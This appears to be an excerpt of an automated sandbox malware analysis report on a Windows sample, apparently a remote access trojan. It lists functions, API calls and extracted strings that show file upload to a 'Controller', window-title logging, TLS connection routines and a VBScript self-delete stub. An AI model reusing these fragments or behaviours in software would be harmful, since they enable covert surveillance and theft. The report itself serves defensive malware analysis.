SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
CloseHandle.KERNEL32(00000000), ref: 00408F64
CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
CloseHandle.KERNEL32(00000000), ref: 00408FFC

Strings

NG, xrefs: 00408C17
Uploading file to Controller: , xrefs: 00408DD5
SetFilePointerEx error, xrefs: 00408FD4
ReadFile error, xrefs: 00408FC8

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
API String ID: 3086580692-2582957567
Opcode ID: 8c75c510ab58963cd608c4bd69969698b676932eb69fabf005083baa81a7a845
Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
Opcode Fuzzy Hash: 8c75c510ab58963cd608c4bd69969698b676932eb69fabf005083baa81a7a845
Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B

Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 0040A740

Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927

Strings

pQG, xrefs: 0040A771
pQG, xrefs: 0040A761
8SG, xrefs: 0040A7F7
PG, xrefs: 0040A907
8SG, xrefs: 0040A802
PG, xrefs: 0040A7AC

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: 8SG$8SG$pQG$pQG$PG$PG
API String ID: 3795512280-1152054767
Opcode ID: 0525908bb1914bec9c42da7cfd9e9f0a9410ebc6d7f2843cb130dd62aab83ac1
Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
Opcode Fuzzy Hash: 0525908bb1914bec9c42da7cfd9e9f0a9410ebc6d7f2843cb130dd62aab83ac1
Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
WSAGetLastError.WS2_32 ref: 00404A21

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

Connection Refused, xrefs: 00404A76
TLS Handshake... | , xrefs: 00404904
TLS Error 3, xrefs: 004049D8
TLS Authentication Failed, xrefs: 00404999
TLS Error 1, xrefs: 00404937
PkGNG, xrefs: 004048C8
TLS Error 2, xrefs: 00404955
Connection Failed: , xrefs: 00404A43

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-3229884001
Opcode ID: 243591419774189001aa764e70b40d46cb73a0ea0479e575723d29e1a88585fe
Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
Opcode Fuzzy Hash: 243591419774189001aa764e70b40d46cb73a0ea0479e575723d29e1a88585fe
Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

Function 0218152D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 02181571

Part of subcall function 02180769: _free.LIBCMT ref: 02180786
Part of subcall function 02180769: _free.LIBCMT ref: 02180798
Part of subcall function 02180769: _free.LIBCMT ref: 021807AA
Part of subcall function 02180769: _free.LIBCMT ref: 021807BC
Part of subcall function 02180769: _free.LIBCMT ref: 021807CE
Part of subcall function 02180769: _free.LIBCMT ref: 021807E0
Part of subcall function 02180769: _free.LIBCMT ref: 021807F2
Part of subcall function 02180769: _free.LIBCMT ref: 02180804
Part of subcall function 02180769: _free.LIBCMT ref: 02180816
Part of subcall function 02180769: _free.LIBCMT ref: 02180828
Part of subcall function 02180769: _free.LIBCMT ref: 0218083A
Part of subcall function 02180769: _free.LIBCMT ref: 0218084C
Part of subcall function 02180769: _free.LIBCMT ref: 0218085E

_free.LIBCMT ref: 02181566

Part of subcall function 021769E9: HeapFree.KERNEL32(00000000,00000000,?,02180ED6,?,00000000,?,00000000,?,0218117A,?,00000007,?,?,021816C5,?), ref: 021769FF
Part of subcall function 021769E9: GetLastError.KERNEL32(?,?,02180ED6,?,00000000,?,00000000,?,0218117A,?,00000007,?,?,021816C5,?,?), ref: 02176A11

_free.LIBCMT ref: 02181588
_free.LIBCMT ref: 0218159D
_free.LIBCMT ref: 021815A8
_free.LIBCMT ref: 021815CA
_free.LIBCMT ref: 021815DD
_free.LIBCMT ref: 021815EB
_free.LIBCMT ref: 021815F6
_free.LIBCMT ref: 0218162E
_free.LIBCMT ref: 02181635
_free.LIBCMT ref: 02181652
_free.LIBCMT ref: 0218166A

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction ID: e12dc5eda668ee3b1f2683bab5dc1973778b7ab899b0eb19034bec7b75360ee7
Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction Fuzzy Hash: 16315973A80741AFEB24BE39DC86B5A73EAAF45310F24441AE49DD6150DF70ED418E60

Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0045130A

Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
Part of subcall function 00450502: _free.LIBCMT ref: 00450531
Part of subcall function 00450502: _free.LIBCMT ref: 00450543
Part of subcall function 00450502: _free.LIBCMT ref: 00450555
Part of subcall function 00450502: _free.LIBCMT ref: 00450567
Part of subcall function 00450502: _free.LIBCMT ref: 00450579
Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
Part of subcall function 00450502: _free.LIBCMT ref: 004505F7

_free.LIBCMT ref: 004512FF

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00451321
_free.LIBCMT ref: 00451336
_free.LIBCMT ref: 00451341
_free.LIBCMT ref: 00451363
_free.LIBCMT ref: 00451376
_free.LIBCMT ref: 00451384
_free.LIBCMT ref: 0045138F
_free.LIBCMT ref: 004513C7
_free.LIBCMT ref: 004513CE
_free.LIBCMT ref: 004513EB
_free.LIBCMT ref: 00451403

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59

Function 0213D060 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 203COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0213D06E
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0213D087
_wcslen.LIBCMT ref: 0213D14D
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0213D1D5
_wcslen.LIBCMT ref: 0213D22D
CloseHandle.KERNEL32 ref: 0213D294
ShellExecuteW.SHELL32(00000000,00466108,00000000,00466468,00466468,00000001), ref: 0213D2B2
ExitProcess.KERNEL32 ref: 0213D2C9

Strings

hdF, xrefs: 0213D29C
6, xrefs: 0213D141
C:\Users\user\Desktop\ltlbVjClX9.exe, xrefs: 0213D0F8, 0213D0FD, 0213D130, 0213D1E5, 0213D1EA, 0213D1F1, 0213D252

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _wcslen$CreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Users\user\Desktop\ltlbVjClX9.exe$hdF
API String ID: 3303048660-3694798855
Opcode ID: 9b2c68406539d7ecccf502c437122ac65188e7e7d5d74230c1500bfed18277f0
Instruction ID: 33c91d32449444390e7e7c4892350a16a2eae4fc57be285bec56d27fc5124d42
Opcode Fuzzy Hash: 9b2c68406539d7ecccf502c437122ac65188e7e7d5d74230c1500bfed18277f0
Instruction Fuzzy Hash: 2E51F1212887006FD61AB734AD50B6F339FAF85B11F10482DFD0A9A1D1DF69DD058A6A

Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
ExitProcess.KERNEL32 ref: 0040D9C4

Strings

Temp, xrefs: 0040D89A
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D8F9
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040D967
""", 0, xrefs: 0040D8E1
exepath, xrefs: 0040D831
open, xrefs: 0040D9B2
8SG, xrefs: 0040D80F
.vbs, xrefs: 0040D85F

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-3159800282
Opcode ID: 80bc6ed54a6d0b090fd4e04be1ba2abf25e439aabe0b1b984706225dfa44172e
Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
Opcode Fuzzy Hash: 80bc6ed54a6d0b090fd4e04be1ba2abf25e439aabe0b1b984706225dfa44172e
Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98

Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450648
_free.LIBCMT ref: 0045066C
_free.LIBCMT ref: 00450679
_free.LIBCMT ref: 0045069E
_free.LIBCMT ref: 004506AB
_free.LIBCMT ref: 004506B4
_free.LIBCMT ref: 00450992
_free.LIBCMT ref: 0045099A

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798

Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6

GetLastError.KERNEL32 ref: 00455CEF
__dosmaperr.LIBCMT ref: 00455CF6
GetFileType.KERNEL32(00000000), ref: 00455D02
GetLastError.KERNEL32 ref: 00455D0C
__dosmaperr.LIBCMT ref: 00455D15
CloseHandle.KERNEL32(00000000), ref: 00455D35
CloseHandle.KERNEL32(?), ref: 00455E7F
GetLastError.KERNEL32 ref: 00455EB1
__dosmaperr.LIBCMT ref: 00455EB8

Strings

H, xrefs: 00455E3D

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59

Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
__alloca_probe_16.LIBCMT ref: 00453EEA
MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
__alloca_probe_16.LIBCMT ref: 00453F94
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C

Part of subcall function 00446137: RtlAllocateHeap.KERNEL32(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
__freea.LIBCMT ref: 00454003
__freea.LIBCMT ref: 0045400F

Strings

\@E, xrefs: 00453F37, 00453DF1

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID: \@E
API String ID: 201697637-1814623452
Opcode ID: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
Opcode Fuzzy Hash: 347d6d77569ccb8731e03be0652f4f39992ef0e8e93efb01081f6886d5a4a2b8
Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768

Function 0044AC49 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
__alloca_probe_16.LIBCMT ref: 0044ACDB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
__alloca_probe_16.LIBCMT ref: 0044ADC0
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
__freea.LIBCMT ref: 0044AE30

Part of subcall function 00446137: RtlAllocateHeap.KERNEL32(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

__freea.LIBCMT ref: 0044AE39
__freea.LIBCMT ref: 0044AE5E

Strings

$C, xrefs: 0044AC5B
PkGNG, xrefs: 0044AC4B

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID: $C$PkGNG
API String ID: 3864826663-3740547665
Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A

Function 0214988E Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON

Download Yara Rule

Strings

0, xrefs: 021498B8
5, xrefs: 02149A70
3, xrefs: 021499BB
VG, xrefs: 021498F2
2, xrefs: 0214995B
4, xrefs: 02149A1F
1, xrefs: 021498FC
6, xrefs: 02149A7A
7, xrefs: 02149A91

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7$VG
API String ID: 0-1861860590
Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
Instruction ID: 56bac84e52032bb93778d4335b598cc70c6c58a532911032fb9e0c82a921a436
Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
Instruction Fuzzy Hash: 2971B2B05C8301AFE319EF20D861BAA7B97AF98721F50490DF996671D0EF749908CB53

Function 02180C8C Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02180CFB
_free.LIBCMT ref: 02180D09
_free.LIBCMT ref: 02180E37
_free.LIBCMT ref: 02180E42

Strings

\&G, xrefs: 02180E83
`&G, xrefs: 02180E9B
\&G, xrefs: 02180E8B

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
Instruction ID: 6368e1a4c04c9e8090fc02a784652b03e562490c7960672c916d29811702cb98
Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
Instruction Fuzzy Hash: F261C672D80249AFDB20EF68C881B9EBBF5EF49710F144169E958EB250E731AD45CF50

Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450A94
_free.LIBCMT ref: 00450AA2
_free.LIBCMT ref: 00450BD0
_free.LIBCMT ref: 00450BDB

Strings

\&G, xrefs: 00450C24
`&G, xrefs: 00450C34
\&G, xrefs: 00450C1C

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98

Function 02144E17 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

65535, xrefs: 02144E1A
udp, xrefs: 02144EC7, 02144ECF, 02144ED3

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction ID: 8a4f64fee8c9e9dde3b4012bdbed048a1466c71a97fe3b2a9fc8c69e0400d8c2
Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction Fuzzy Hash: 7F5125756C9301AFE3248E1CC808B3B77E9EF85755F18062DF89E96290EF69C841C762

Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

65535, xrefs: 00414BB3
udp, xrefs: 00414C60, 00414C68, 00414C6C

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E

Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040AD38
Sleep.KERNEL32(000001F4), ref: 0040AD43
GetForegroundWindow.USER32 ref: 0040AD49
GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
Sleep.KERNEL32(000003E8), ref: 0040AE54

Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

minutes }, xrefs: 0040AE7A
{ User has been idle for , xrefs: 0040AE86
], xrefs: 0040ADE8
[, xrefs: 0040ADEE

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
